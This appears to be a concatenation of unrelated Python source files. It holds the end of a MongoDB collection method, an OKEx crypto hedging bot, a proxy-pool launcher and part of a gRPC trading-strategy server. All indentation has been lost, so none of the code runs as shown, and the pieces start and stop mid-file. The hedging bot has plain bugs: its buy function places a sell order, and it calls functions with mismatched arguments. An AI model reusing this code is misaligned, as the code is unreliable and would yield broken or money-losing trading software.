raise ValueError("Can't do both update and remove")
# No need to include empty args
if query:
kwargs['query'] = query
if update:
kwargs['update'] = update
if upsert:
kwargs['upsert'] = upsert
if sort:
# Accept a list of tuples to match Cursor's sort parameter.
if isinstance(sort, list):
kwargs['sort'] = helpers._index_document(sort)
# Accept OrderedDict, SON, and dict with len == 1 so we
# don't break existing code already using find_and_modify.
elif (isinstance(sort, ORDERED_TYPES) or
isinstance(sort, dict) and len(sort) == 1):
warnings.warn("Passing mapping types for `sort` is deprecated,"
" use a list of (key, direction) pairs instead",
DeprecationWarning, stacklevel=2)
kwargs['sort'] = sort
else:
raise TypeError("sort must be a list of (key, direction) "
"pairs, a dict of len 1, or an instance of "
"SON or OrderedDict")
fields = kwargs.pop("fields", None)
if fields is not None:
kwargs["fields"] = helpers._fields_list_to_dict(fields, "fields")
collation = validate_collation_or_none(kwargs.pop('collation', None))
cmd = SON([("findAndModify", self.__name)])
cmd.update(kwargs)
write_concern = self._write_concern_for_cmd(cmd, None)
def _find_and_modify(session, sock_info, retryable_write):
if (sock_info.max_wire_version >= 4 and
not write_concern.is_server_default):
cmd['writeConcern'] = write_concern.document
result = self._command(
sock_info, cmd, read_preference=ReadPreference.PRIMARY,
collation=collation,
session=session, retryable_write=retryable_write,
user_fields=_FIND_AND_MODIFY_DOC_FIELDS)
_check_write_command_response(result)
return result
out = self.__database.client._retryable_write(
write_concern.acknowledged, _find_and_modify, None)
if full_response:
return out
else:
document = out.get('value')
if manipulate:
document = self.__database._fix_outgoing(document, self)
return document
def __iter__(self):
return self
def __next__(self):
raise TypeError("'Collection' object is not iterable")
next = __next__
def __call__(self, *args, **kwargs):
"""This is only here so that some API misusages are easier to debug.
"""
if "." not in self.__name:
raise TypeError("'Collection' object is not callable. If you "
"meant to call the '%s' method on a 'Database' "
"object it is failing because no such method "
"exists." %
self.__name)
raise TypeError("'Collection' object is not callable. If you meant to "
"call the '%s' method on a 'Collection' object it is "
"failing because no such method exists." %
self.__name.split(".")[-1])
|
hedging.py
|
import json
import os
import queue
import threading
import asyncio
from copy import copy
import sys
import logging
import time
from multiprocessing import Queue
curPath = os.path.abspath(os.path.dirname(__file__))
rootPath = os.path.split(curPath)[0]
rootPath = os.path.split(rootPath)[0]
os.sys.path.append(rootPath)
from dquant.constants import Constants
from dquant.strategy.trigger import DepthIndexTrigger
from dquant.markets._okex_future_rest import OkexFutureRest
from dquant.markets._okex_future_ws import OkexFutureWs
from dquant.markets._okex_spot_ws_v2 import OkexSpotWs
from dquant.common.alarms import alarm_of_stock
logger = logging.getLogger("dquant")
logger.setLevel(logging.DEBUG)
ch = logging.StreamHandler()
ch.setLevel(logging.INFO)
fh = logging.FileHandler('../../logs/OKEXHedging.log', mode='w')
fh.setLevel(logging.DEBUG)
formatter = logging.Formatter('%(asctime)s - %(name)s - %(levelname)s - %(message)s')
fh.setFormatter(formatter)
ch.setFormatter(formatter)
logger.addHandler(fh)
logger.addHandler(ch)
# config_name = "configHedging.json"
#config_name = "../strategy/configHedging.json"
q_msg = Queue()
class TakersWs(threading.Thread):
def __init__(self, mkt, meta_code, strategy_id, config_name="configHedging.json"):
super(TakersWs, self).__init__()
new = asyncio.new_event_loop()
asyncio.set_event_loop(new)
self.mkt = mkt(meta_code, loop=new)
self.mkt.strategy_id = strategy_id
self.mkt.trigger = True
self.base_coin = self.mkt.base_currency
self.target_coin = self.mkt.market_currency
self.minimum_amount = self.mkt.minimum_amount
self.name = self.mkt.name
self.fee_rate = self.mkt.fee_rate
self.q = queue.Queue()
self.q_output = queue.Queue()
self.mkt.setDaemon(True)
self.mkt.start()
self.c = 0
self.error_c = 0
self.accumulative_amount = 0
self.total_filled = 0
# 列队状态
self.status = True
# 交易所状态 是否可用
self.available = True
self.config = json.load(open(config_name, 'r'))
self.max_task_on_do = self.config["max_task_on_do"]
self.minimum_amount = self.config[meta_code]["minimum_amount"]
self.taker_action = {"long": self.mkt_sell, "short": self.mkt_buy,
"sell": self.mkt_sell, "buy": self.mkt_buy}
def check_task_done(self):
task_on_do = self.q.qsize() + self.c
if not self.status or (not task_on_do and not self.accumulative_amount):
return True
else:
return False
def check_task_on_do(self):
if not self.status:
logger.warning("Blocking the thread")
task_on_do = self.q.qsize() + self.c
if task_on_do >= self.max_task_on_do:
logger.warning('Taker(%s) task on do: %s' % (self.name, task_on_do))
self.status = False
else:
self.status = True
def getDepth(self):
try:
depth = self.mkt.getDepth()
return depth
except TimeoutError:
self.available = False
return None
def parse_meta(self, meta_code):
self.mkt.parse_meta(meta_code)
def mkt_sell(self, total_price):
depth = self.getDepth()
ref_price = (depth['bids'][0]['price'] + depth['asks'][0]['price']) / 2
res = self.mkt.sell(amount=total_price/ref_price)
return res
def mkt_buy(self, total_price, reference_price):
res = self.mkt.sell(total_price)
return res
def run(self):
while True:
self.check_task_on_do()
m = self.q.get()
side = m['side']
logger.debug('Taker get message: %s' % m)
total_price = float(m.get('total_price'))
# 定价模型,这里先用买一价作为目标价格,因此amount=total_price/bid_price
depth = self.getDepth()
ref_price = (depth['bids'][0]['price'] + depth['asks'][0]['price']) / 2
amount_to_be_filled = total_price / ref_price + self.accumulative_amount
# BTC 数量大于等于0.01 / LTC 数量大于等于0.1 / ETH 数量大于等于0.01
if amount_to_be_filled >= self.minimum_amount:
logger.info("Taker get message from maker: %s, real amount is %s." % (m, amount_to_be_filled))
result = None
self.c += 1
try:
result = self.taker_action[side](total_price)
logger.debug("Taker result: %s" % result)
if result and "order_id" in result:
order_id = result['order_id']
taker_side = "buy" if side == 'short' else "sell"
logger.info('Okex Spot: Taker order(%s) %s, total_price %s' % (order_id, taker_side, total_price))
self.accumulative_amount = 0
self.total_filled += total_price
self.q_output.put(result)
else:
logger.error('Okex Spot ERROR: %s' % result)
self.error_c += 1
self.q.put(m)
except Exception as ex:
logger.error('Okex Spot ERROR(%s): %s' % (ex, result))
self.error_c += 1
self.q.put(m)
finally:
self.c -= 1
# 某个Taker报错超过5次
if self.error_c >= 5:
logger.critical("Fatal Error: Taker %s seems not working properly, exit" % self.name)
self.q_output.put({})
self.status = False
break
else:
logger.info("%s is less than minimum amount: %s" % (amount_to_be_filled, self.minimum_amount))
self.accumulative_amount += amount_to_be_filled
self.total_filled += total_price
class OkexSpotWsTaker(TakersWs):
def __init__(self, meta_code, strategy_id):
super(OkexSpotWsTaker, self).__init__(OkexSpotWs, meta_code, strategy_id)
class Okex_Future(threading.Thread):
def __init__(self, meta_code, strategy_id):
super(Okex_Future, self).__init__()
self.loop = asyncio.new_event_loop()
asyncio.set_event_loop(self.loop)
self.okex = OkexFutureWs(meta_code, self.loop)
self.name = self.okex.name
self.okex_rest = OkexFutureRest(meta_code)
self.okex.strategy_id = strategy_id
# self.q_trigger = self.okex.q_trigger
self.q_order_result = self.okex.q_order_result
self.okex.start()
self.last_get_order_info = {'order_id':None, 'amount_filled': None}
self.lastPosition = 0
self.q = queue.Queue()
self.q_output = queue.Queue()
self.order = [None, '']
self.order_id = None
self.side = ''
self.meta_code = meta_code
def reset(self):
self.order = [None, '']
self.order_id = None
self.side = ''
def get_latest_order(self, side):
# 查询买卖订单
hist = self.okex.getHist()
temp_hist = copy(hist)
# 从最近成交/成功删除的订单开始遍历
latest_order_id, latest_order_details = temp_hist[side].popitem()
return {'order_id':latest_order_id, 'details': latest_order_details}
def my_getOrder(self, order_id):
# 初始化返回结果
order_details = self.okex.getOrder(order_id)
amount_filled = order_details['deal_amount']
amount_orig = order_details['amount']
price = order_details['price']
side = order_details['type']
ret = {'order_id': order_id, 'price': price, 'amount_filled': amount_filled, 'amount_orig': amount_orig, 'side': side}
return ret
def run(self):
while True:
m = self.q.get()
if m['type'] in ['Initial long order', 'Initial short order']:
q_msg.put({'meta_code': self.meta_code, 'type': m['type'].split(' ')[1]})
if m['type'] == 'Initial long order':
amount = m['amount']
future_depth = self.okex.getDepth()
future_bid_price = future_depth['bids'][0]['price']
result = self.okex.long(amount=amount, price=future_bid_price)
# self.order_id = result['order_id']
self.order = [result['order_id'], 'long']
logger.info('Long Order: id %s @%s' % (result['order_id'], future_bid_price))
self.q_output.put(result)
# self.loop.call_soon_threadsafe(self.q_output.put_nowait, result)
elif m['type'] == 'Initial short order':
amount = m['amount']
future_depth = self.okex.getDepth()
future_ask_price = future_depth['asks'][0]['price']
result = self.okex.short(amount=amount, price=future_ask_price)
# self.order_id = result['order_id']
self.order = [result['order_id'], 'short']
logger.info('Short Order: id %s @%s' % (result['order_id'], future_ask_price))
self.q_output.put(result)
elif m['type'] == 'Get order':
ret = self.my_getOrder(self.order[0])
# details = ret
order_id = ret['order_id']
amount_filled = ret['amount_filled']
amount_orig = ret['amount_orig']
if amount_orig:
self.lastPosition = amount_orig - amount_filled
# 控制输出,与上次相同的数据就不用输出了
last_id = self.last_get_order_info['order_id']
last_amount_filled = self.last_get_order_info['amount_filled']
if last_id != ret['order_id'] or last_amount_filled != amount_filled:
self.last_get_order_info['order_id'] = ret['order_id']
self.last_get_order_info['amount_filled'] = amount_filled
logger.info('GetOrder: id %s, filled: %s' % (ret['order_id'], amount_filled))
# 查不到订单,输出一下成交数量,结束循环
else:
try:
latest_executed_order = self.get_latest_order(side=self.order[1])
amount_filled = latest_executed_order['details']['deal_amount']
amount_orig = latest_executed_order['details']['amount']
amount_remain = amount_orig - amount_filled
self.lastPosition = amount_remain # 正常情况下是0
logger.info('GetOrder: id %s, filled: %s' % (latest_executed_order['order_id'], amount_filled))
break
except Exception as ex:
logger.error('GetOrder: %s' % ex)
ret['amount_filled'] = amount_filled
self.q_output.put(ret)
# self.loop.call_soon_threadsafe(self.q_output.put_nowait, ret)
elif m['type'] == 'Delete and place new order':
ret = self.my_getOrder(self.order_id[0])
# 待下单信息
price = m['price']
side = m['side']
# 待删除订单信息
order_id = ret['order_id']
# 删除订单
# 订单状态未完成(可以查到订单号)
if order_id:
self.okex.deleteOrder(order_id)
result = self.okex.getOrder(order_id)
amount_filled = result['deal_amount']
amount_orig = result['amount']
# amount_remain = amount_orig - amount_filled
self.lastPosition = amount_orig - amount_filled
old_price = result['price']
logger.info('Delete: canceling order %s @%s, filled %s, last position: %s' % (order_id, old_price, amount_filled, self.lastPosition))
# 订单已完成
else:
latest_executed_order = self.get_latest_order(side='long')
amount_filled = latest_executed_order['details']['deal_amount']
amount_orig = latest_executed_order['details']['amount']
amount_remain = amount_orig - amount_filled
self.lastPosition = amount_remain # 正常情况下是0
logger.info('Delete: id %s has been filled before deleted, amount: %s ' % (latest_executed_order['order_id'], amount_filled))
break
# 下单, 数量是删除订单时返回的
amount = self.lastPosition
if side == 'long':
res = self.okex.long(amount=amount, price=price)
else:
res = self.okex.short(amount=amount, price=price)
# self.order_id = res['order_id']
self.order[0] = res['order_id']
order = self.okex.getOrder(res['order_id'])
logger.info('Place order: %s: amount %s' % (order['order_id'], order['amount']))
message = {'type': 'Order new', 'order_id': order['order_id'], 'amount': order['amount']}
self.q_output.put(message)
# self.loop.call_soon_threadsafe(self.q_output.put_nowait, message)
elif m['type'] == 'Close order':
self.okex.deleteOrder(self.order_id[0])
if self.order_id[1] == 'long':
self.okex_rest.close_all_long_orders()
else:
self.okex_rest.close_all_short_orders()
class Hedging(threading.Thread):
def __init__(self, config_name="configHedging.json"):
super(Hedging, self).__init__()
self.config = json.load(open(config_name, 'r'))
self.meta_code_spot = self.config['meta_code_spot']
self.meta_code_future = self.config['meta_code_future']
self.initial_amount = self.config['initial_amount']
self.strategy_id = self.config['strategy_id']
self.trigger_amount = self.config['trigger_amount']
self.trigger_order_premium = self.config['trigger_order_premium']
self.trigger_close_premium = self.config['trigger_close_premium']
self.spot_mkt = None
self.future_mkt = None
self.generateObj()
self.no_task = False
self.reference_bid_price = None
self.order_record = {}
self.trigger =DepthIndexTrigger.Q_TRIGGER
self.depths = {self.spot_mkt.name: {}, self.future_mkt.name: {}}
self.makerThread = threading.Thread(target=self.maker)
self.makerThread.setDaemon(True)
self.makerThread.start()
def generateObj(self):
self.spot_mkt = OkexSpotWsTaker(self.meta_code_spot, strategy_id=self.strategy_id)
self.spot_mkt.setDaemon(True)
self.spot_mkt.start()
self.future_mkt = Okex_Future(self.meta_code_future, strategy_id=self.strategy_id)
self.future_mkt.setDaemon(True)
self.future_mkt.start()
def _has_future_order(self):
return self.future_mkt.order_id
def get_amount_filled_and_orig(self):
amount_orig = 0
amount_filled = 0
if self.order_record:
for order_id, details in self.order_record.items():
amount_filled += details[0]
amount_orig += details[1]
return amount_filled, amount_orig
def run(self):
count = 0
# 当成交trigger_amount单位期货,触发现货买入/卖出trigger_amount*100等价的BTC
# trigger_amount = 1
while True:
# 订单更新信息来驱动策略
# message = {'order_id': order_id,'amount_orig': amount,'amount_filled': deal_amount,'message_type': 'order update'}
message = self.future_mkt.q_order_result.get()
# print(message)
if not self.future_mkt.order_id:
continue
self.order_record.update({message['order_id']: [message['amount_filled'], message['amount_orig']]})
# self.last_order['order_id'] = message
side = message['side']
amount_filled, amount_orig = self.get_amount_filled_and_orig()
amount_remain = amount_orig - amount_filled
# 余下额度不满足taker最小交易额的时候,等待最后全部成交
if side == "long":
reference_price = self.depths[self.spot_mkt.name]['bids'][0]['price']
else:
reference_price = self.depths[self.spot_mkt.name]['asks'][0]['price']
if amount_remain and amount_remain * 100 / reference_price < self.spot_mkt.minimum_amount:
logger.info("Future amount_remain: %s" % amount_remain)
continue
# 如果订单数量已经不足以触发策略,raise AssertException
# assert self.trigger_amount * count <= amount_orig
if amount_filled >= self.trigger_amount:
# 如果一次成交5,trigger为2,则应该触发2倍的现货卖出, 因为得到的是累计成交量,需要减去过去成交过的数量
times = amount_filled // self.trigger_amount - count
# BTC 100USD/张, ETH 10USD/张
# 触发次数*每次卖出的数量*100
total_price = times * self.trigger_amount * 100
self.spot_mkt.q.put({'total_price': total_price, "side": side})
count = amount_filled // self.trigger_amount
# self.spot_mkt.q_output.get()
if amount_filled == amount_orig:
logger.info('The order has done')
while True:
logger.debug("check_task_done:%s; total_filled: %s, initial: %s" % (self.spot_mkt.check_task_done(), self.spot_mkt.total_filled, self.initial_amount))
if (self.spot_mkt.check_task_done() and self.spot_mkt.total_filled == self.initial_amount*100) or not self.spot_mkt.status:
self.no_task = True
time.sleep(1)
def close_contract(self):
pass
def maker(self):
# self.future_mkt.q.put({'type': 'Initial long order', 'amount': self.initial_amount})
# self.future_mkt.q_output.get()
while True:
# 期货市场Depth/index/现货Depth更新信息来驱动策略
# message = {"asks": list_of_ask, 'bids': list_of_bid, "name": self.name}
# message = self.future_mkt.q_trigger.get()
message = self.trigger.get()
# 更新深度表
self.depths[message["name"]] = message
# 期货指数、期货价格、现货指数都已获取到
if len(self.depths) < 3:
logger.info("Got market info from %s, %s/3" % (self.depths.keys(), len(self.depths)))
continue
# 计算升贴水
index = self.depths["{}_index".format(self.future_mkt.name)]["futureIndex"]
future_bid0 =self.depths[self.future_mkt.name]['bids'][0]['price']
future_ask0 =self.depths[self.future_mkt.name]['asks'][0]['price']
spot_bid0 = self.depths[self.spot_mkt.name]['bids'][0]['price']
spot_ask0 = self.depths[self.spot_mkt.name]['asks'][0]['price']
spot_price = (spot_bid0 + spot_ask0) / 2
premium = (index - spot_price) / spot_price
print("premium: %s" % premium)
# self.reference_bid_price = float(message['bid_price'])
# print(message)
# 当前状态无订单
if premium >= self.trigger_order_premium and not self._has_future_order():
logger.info("premium: %s" % premium)
# 升水的时候期货做空,现货做多
self.future_mkt.q.put({'type': 'Initial short order', 'amount': self.initial_amount})
self.future_mkt.q_output.get()
self.future_side = 'long'
logger.info("Open long position %s" % self.initial_amount)
elif premium <= - self.trigger_order_premium and not self._has_future_order():
logger.info("premium: %s" % premium)
# 贴水的时候期货做多,现货做空
self.future_mkt.q.put({'type': 'Initial long order', 'amount': self.initial_amount})
self.future_mkt.q_output.get()
self.future_side = 'short'
logger.info("Open short position %s" % self.initial_amount)
# 当前状态有订单
if - self.trigger_close_premium <= premium <= self.trigger_close_premium and self._has_future_order():
logger.info("premium: %s" % premium)
# 平仓
self.future_mkt.q.put({'type': 'Close order'})
self.future_mkt.q_output.get()
side = "buy" if self.future_mkt.order[1] == "long" else "sell"
amount_filled, amount_orig = self.get_amount_filled_and_orig()
total_price = amount_filled
self.spot_mkt.q.put({'total_price': total_price, "side": side})
self.future_mkt.reset()
logger.info("Close position.")
if not self._has_future_order():
continue
# 获取当前订单信息
self.future_mkt.q.put({'type': 'Get order'})
m = self.future_mkt.q_output.get()
my_price = m['price']
side = m['side']
if m['amount_orig'] == m['amount_filled']:
logger.info('The order has been filled')
break
if side == 'long':
# assert m['amount_filled'] < initial_amount
if my_price and future_bid0 > my_price:
amount = m['amount_orig'] - m['amount_filled']
self.future_mkt.q.put({'type': 'Delete and place new order', 'price': future_bid0, "side":side})
logger.info('Delete and place new order: Long %s @%s, past: @%s' % (amount, future_bid0, my_price))
self.future_mkt.q_output.get()
else:
if my_price and future_ask0 < my_price:
amount = m['amount_orig'] - m['amount_filled']
self.future_mkt.q.put({'type': 'Delete and place new order', 'price': future_ask0, "side":side})
logger.info('Delete and place new order: Short %s @%s, past: @%s' % (amount, future_ask0, my_price))
self.future_mkt.q_output.get()
def create_hedging_process(amount, future_meta, spot_meta):
logger.info("Hedging Program get task: amount: %s, future: %s, spot: %s" % (amount, future_meta, spot_meta))
okexHedge = Hedging()
okexHedge.start()
# okexHedge.join()
while True:
if okexHedge.no_task:
logger.info('End of process')
sys.exit()
def hedge():
okexHedge = Hedging()
okexHedge.start()
okexHedge.join()
def hedge_eth():
okexHedge = Hedging()
okexHedge.start()
okexHedge.join()
def hAlarm():
msg = q_msg.get()
mtype = msg['type']
okex_rest = OkexFutureRest(msg['meta_code'])
okex_rest.start()
while True:
cur_bao = okex_rest.get_current_and_baocang_price()
success = alarm_of_stock(cur_bao['current_price'], cur_bao['baocang_price'], mtype)
if success:
print('爆仓报警发出去了。只报一次哦!')
break
if __name__ == "__main__":
os.environ[Constants.DQUANT_ENV] = "dev"
# tasks = [hAlarm, hedge]
#
# from multiprocessing import Pool
# p = Pool(2)
# for task in tasks:
# p.apply_async(task, args=())
# p.close()
# p.join()
okexHedge = Hedging()
okexHedge.start()
okexHedge.join()
|
main.py
|
# -*- coding: utf-8 -*-
"""
-------------------------------------------------
File Name: main.py
Description : 运行主函数
Author : JHao
date: 2017/4/1
-------------------------------------------------
Change Activity:
2017/4/1:
-------------------------------------------------
"""
__author__ = 'JHao'
import sys
from multiprocessing import Process
import subprocess
sys.path.append('.')
sys.path.append('..')
from Api.ProxyApi import run as ProxyApiRun
from Schedule.ProxyValidSchedule import run as ValidRun
from Schedule.ProxyRefreshSchedule import run as RefreshRun
def run_redis_server():
subprocess.run(r"D:\program\Redis-x64-3.2.100\redis-server.exe",shell = True)
def run():
p_list = list()
p0 = Process(target=run_redis_server,name= 'run_redis_server')
p_list.append(p0)
p1 = Process(target=ProxyApiRun, name='ProxyApiRun')
p_list.append(p1)
p2 = Process(target=ValidRun, name='ValidRun')
p_list.append(p2)
p3 = Process(target=RefreshRun, name='RefreshRun')
p_list.append(p3)
for p in p_list:
p.daemon = True
p.start()
for p in p_list:
p.join()
if __name__ == '__main__':
run()
|
server.py
|
import threading
import signal
from concurrent import futures
import queue
import abc
from functools import partial
import grpc
import click
from google.protobuf import empty_pb2 as emp
from pluto.interface.utils import paths, service_access
from pluto.interface import directory
from pluto.coms.utils import conversions
from pluto.control.controllable import commands
from pluto.control.events_log import events_log
from pluto.control.controllable.utils import io
from pluto.control.controllable.utils import factory
from protos import broker_pb2
from protos import controllable_pb2
from protos import controllable_pb2_grpc as cbl_rpc
from protos import interface_pb2_grpc as itf_rpc
from protos import interface_pb2 as itf
from protos.clock_pb2 import (
BAR,
TRADE_END)
class _StateStorage(object):
def __init__(self, storage_path, thread_pool):
'''
Parameters
----------
storage_path: str
thread_pool: concurrent.futures.ThreadPoolExecutor
'''
self._storage_path = storage_path
self._thread_pool = thread_pool
def _write(self, state):
# todo: should we append instead of over-writing?
with open(self._storage_path, 'wb') as f:
f.write(state)
def store(self, dt, controllable):
self._thread_pool.submit(partial(
self._write,
state=controllable.get_state(dt)))
def load_state(self):
with open(self._storage_path, 'rb') as f:
return f.read()
class _NoStateStorage(object):
def store(self, dt, controllable):
pass
class FrequencyFilter(abc.ABC):
@abc.abstractmethod
def filter(self, evt_exc_pairs):
raise NotImplementedError
class DayFilter(FrequencyFilter):
def filter(self, evt_exc_pairs):
exchanges = []
for evt, exc in evt_exc_pairs:
if evt == TRADE_END:
exchanges.append(exc)
return exchanges
class MinuteFilter(FrequencyFilter):
def filter(self, evt_exc_pairs):
exchanges = []
for evt, exc in evt_exc_pairs:
if evt == TRADE_END or evt == BAR:
exchanges.append(exc)
return exchanges
class _ServiceState(abc.ABC):
__slots__ = ['_service', '_controllable']
def __init__(self, service, controllable):
self._service = service
self._controllable = controllable
def execute(self, command):
self._execute(self._service, command, self._controllable)
@abc.abstractmethod
def _execute(self, service, command, controllable):
raise NotImplementedError
class _Recovering(_ServiceState):
def _execute(self, service, command, controllable):
if command.dt <= controllable.current_dt:
# don't do anything if the signal has "expired" this might happen
# if the service receives signals while restoring state...
pass
else:
# set state to running since we're synchronized
service.state = service.ready
# set controllable run state to ready
controllable.run_state = controllable.ready
# execute command
command()
class _Ready(_ServiceState):
def _execute(self, service, command, controllable):
command()
class _NoneObserver(object):
def clear(self):
pass
def update(self, performance, end):
pass
def stream(self):
pass
class _Observer(object):
def __init__(self, monitor_stub, file_path, session_id):
self._stub = monitor_stub
self._reload = True
self._file_path = file_path
self._session_id = session_id
def clear(self):
self._reload = True
def update(self, performance, end):
stub = self._stub
session_id = self._session_id
if self._reload == True:
self._stream(stub, session_id)
self._reload = False
service_access.invoke(
stub.PerformanceUpdate,
itf.Packet(
packet=performance,
session_id=session_id,
end=end))
def stream(self):
session_id = self._session_id
stub = self._stub
itr = iter(io.read_perf(self._file_path))
try:
n0 = next(itr)
while True:
try:
n1 = next(itr)
service_access.invoke(
stub.PerformanceUpdate,
itf.Packet(
packet=n0,
session_id=session_id))
n0 = n1
except StopIteration:
service_access.invoke(
stub.PerformanceUpdate,
itf.Packet(
packet=n0,
session_id=session_id,
end=True))
break
except StopIteration:
pass
# self._stream(self._stub, self._session_id)
def _stream(self, stub, session_id):
for packet in io.read_perf(self._file_path):
service_access.invoke(
stub.PerformanceUpdate,
itf.Packet(
packet=packet,
session_id=session_id))
class _PerformanceWriter(object):
# class for writing performance in some file...
# todo: need to write to session_id and execution mode (live, paper, simulation)
# live and paper cannot be over-written, only appended
# todo: the writer can make a call-back to some observers
# we also have a reader (which is a writer observer)
# the reader reads the performance in the file and waits for updates from the writer.
# the updates are read before getting written in the filesystem.
def __init__(self, session_id, monitor_stub, file_path, thread_pool):
'''
Parameters
----------
file_path: str
thread_pool: concurrent.futures.ThreadPoolExecutor
'''
self._path = file_path
self._thread_pool = thread_pool
self._none_observer = none = _NoneObserver()
self._observer = _Observer(monitor_stub, file_path, session_id)
self._current_observer = none
self._ended = False
self._lock = threading.Lock()
def _write(self, performance, end, path):
packet = conversions.to_proto_performance_packet(
performance).SerializeToString()
self._current_observer.update(packet, end)
io.write_perf(path, packet)
def performance_update(self, performance, end):
# todo: we need to do a non-blocking write using queues?
# self._thread_pool.submit(partial(
# self._write,
# performance=performance,
# end=end,
# path=self._path))
with self._lock:
self._write(performance, end, self._path)
self._ended = end
def observe(self):
with self._lock:
observer = self._observer
if self._ended == True:
self._thread_pool.submit(
observer.stream)
# observer.stream()
else:
#clear so that we can stream from the beginning
observer.clear()
self._current_observer = observer
def stop_observing(self):
with self._lock:
self._current_observer = self._none_observer
class ControllableService(cbl_rpc.ControllableServicer):
def __init__(self, monitor_stub, controllable_factory, sessions_interface):
'''
Parameters
----------
monitor_stub
controllable_factory
sessions_interface: pluto.interface.directory.StubDirectory
'''
self._perf_writer = None
self._stop = False
self._frequency_filter = None
# used for queueing commands
self._queue = queue.Queue()
self._thread = None
self._controllable = cbl = None
self._ready = _Ready(self, cbl)
self._recovery = recovery = _Recovering(self, cbl)
self._state = recovery
self._strategy_path = None
self._session_interface = sessions_interface
self._state_storage = _NoStateStorage()
self._root_dir = root = paths.get_dir('controllable')
self._states_dir = paths.get_dir('states', root)
self._thread_pool = futures.ThreadPoolExecutor(5)
self._monitor_stub = monitor_stub
self._cbl_fty = controllable_factory
@property
def frequency_filter(self):
return self._frequency_filter
@property
def state(self):
return self._state
@state.setter
def state(self, value):
self._state = value
def ready(self):
return self._ready
def recovering(self):
return self._recovery
# todo need to use an interceptor to check for tokens etc.
def stop(self):
pass
@service_access.framework_only
def Initialize(self, request, context):
with self._session_interface.read() as r:
id_ = request.id # the id of the controllable => will be used in performance updates
session = r.get_session(id_)
data_frequency = session.data_frequency
if data_frequency == 'daily':
self._frequency_filter = DayFilter()
elif data_frequency == 'minute':
self._frequency_filter = MinuteFilter()
mode = request.mode
controllable = self._cbl_fty.get_controllable(mode, id_)
# todo: we should have a directory for performance
# activate state storage if we're in live mode
# todo: it would be cleaner to have an utils file for common paths
perf_path = paths.get_file_path(
mode,
paths.get_dir(
id_,
paths.get_dir('strategies')))
if mode == 'live' or mode == 'paper':
self._state_storage = _StateStorage(
paths.get_file_path(
mode,
paths.get_dir(
id_,
self._states_dir)),
self._thread_pool)
else:
# clear file if we're in simulation mode
with open(perf_path, 'wb') as f:
f.truncate(0)
# todo: we need a monitor stub
self._perf_writer = _PerformanceWriter(
id_,
self._monitor_stub,
paths.get_file_path(perf_path),
self._thread_pool
)
if controllable:
self._controllable = controllable
controllable.initialize(
id_,
conversions.to_datetime(request.start),
conversions.to_datetime(request.end),
session.universe_name,
session.get_strategy(r.get_strategy(session.strategy_id)),
request.capital,
request.max_leverage,
data_frequency,
mode,
session.look_back,
session.cancel_policy)
# run the thread
self._state = self._ready
self._thread = thread = threading.Thread(target=self._run)
thread.start()
else:
context.set_code(grpc.StatusCode.INVALID_ARGUMENT)
context.set_details("Mode {} doesn't exist".format(mode))
return emp.Empty()
def _run(self):
q = self._queue
while not self._stop:
try:
self._state.execute(q.get())
except commands.StopExecution:
break
def _load_state(self, session_id):
with open(paths.get_file_path(session_id, self._states_dir), 'rb') as f:
params = f.read()
state = controllable_pb2.ControllableState()
state.ParseFromString(params)
return state
def restore_state(self, session_id):
# 1)create controllable, (PROBLEM: need mode (from controllable?))
# 2)call restore state on it => this will restore its session_state
# 4)load events from the events log and push them in the queue
# PROBLEM: we need the datetime (from controllable? => current_dt)
# 5)start thread => this will start executing events in the queue
# 6)the controllable must ignore "expired" events : events that have already been processed
state = self._load_state(session_id)
self._controllable = controllable = self._cbl_fty.get_controllable(state.mode)
with open('strategy', self._states_dir) as f:
strategy = f.read()
controllable.restore_state(state, strategy)
# set run_state to recovering
controllable.run_state = controllable.recovering
log = events_log.get_events_log(state.mode)
events = log.read(session_id, controllable.current_dt)
# play all missed events since last checkpoint (controllable is in recovery mode)
perf_writer = self._perf_writer
frequency_filter = self._frequency_filter
state_storage = self._state_storage
# todo: need to handle all the event types
for evt_type, evt in events:
if evt_type == 'clock':
commands.ClockUpdate(
perf_writer,
controllable,
frequency_filter,
evt,
state_storage)()
elif evt_type == 'parameter':
commands.CapitalUpdate(controllable, evt)()
elif evt_type == 'broker':
pass # todo
else:
pass
@service_access.framework_only
def Stop(self, request, context):
#todo needs to liquidate positions and wipe the state.
# multiple steps to execute: place orders, wait for all of them
# to be executed, update performances, then return
self._stop = True
return emp.Empty()
@service_access.framework_only
def UpdateParameters(self, request, context):
self._queue.put(
commands.CapitalUpdate(
self._controllable,
request
)
)
return emp.Empty()
@service_access.framework_only
def UpdateAccount(self, request_iterator, context):
self._queue.put(
commands.AccountUpdate(
self._controllable,
self._load_broker_state(
request_iterator)
)
)
return emp.Empty()
def _load_broker_state(self, request_iterator):
b = b''
for chunk in request_iterator:
b += chunk.data
brk_state = broker_pb2.BrokerState()
brk_state.ParseFromString(b)
return brk_state
@service_access.framework_only
def ClockUpdate(self, request, context):
'''Note: an update call might arrive while the step is executing..., so
we must queue the update message... => the step must be a thread that pulls data
from the queue...
'''
# NOTE: use FixedBasisPointsSlippage for slippage simulation.
self._queue.put(
commands.ClockUpdate(
self._perf_writer,
self._controllable,
self._frequency_filter,
request,
self._state_storage
)
)
return emp.Empty()
# @service_access.framework_only
def Watch(self, request, context):
self._perf_writer.observe()
# @service_access.framework_only
def StopWatching(self, request, context):
self._perf_writer.stop_observing()
class Server(object):
def __init__(self):
self._event = threading.Event()
self._server = grpc.server(futures.ThreadPoolExecutor(10))
def start(self, controllable, url=None):
server = self._server
if not url:
port = server.add_insecure_port('localhost:0')
else:
port = server.add_insecure_port(url)
cbl_rpc.add_ControllableServicer_to_server(controllable, server)
print(port)
server.start()
self._event.wait()
controllable.stop()
server.stop()
def stop(self):
self._event.set()
_SERVER = Server()
def termination_handler(signum, frame):
_SERVER.stop()
def interruption_handler(signum, frame):
_SERVER.stop()
signal.signal(signal.SIGINT, interruption_handler)
signal.signal(signal.SIGTERM, termination_handler)
@click.group()
def cli():
pass
@cli.command()
@click.argument('framework_id')
@click.argument('framework_url')
@click.argument('session_id')
@click.argument('root_dir')
@click.option('-cu', '--controllable-url')
@click.option('--recovery', is_flag=True)
def start(framework_id, framework_url, session_id, root_dir, controllable_url, recovery):
'''
Parameters
----------
framework_url : str
url for callbacks
controllable_url: str
'''
# If the controllable fails, it will be relaunched by the controller.
# TODO: save the framework_url for future use. NOTE: the framework url must be immutable
# (is a service in kubernetes)
# run forever or until an exception occurs, in which case, send back a report to the controller
# or write to a log file. If the strategy crashes internally, there might be some bug that
# need reviewing
with directory.StubDirectory(root_dir) as d:
# set the framework_id if ran as a process
service_access._framework_id = framework_id
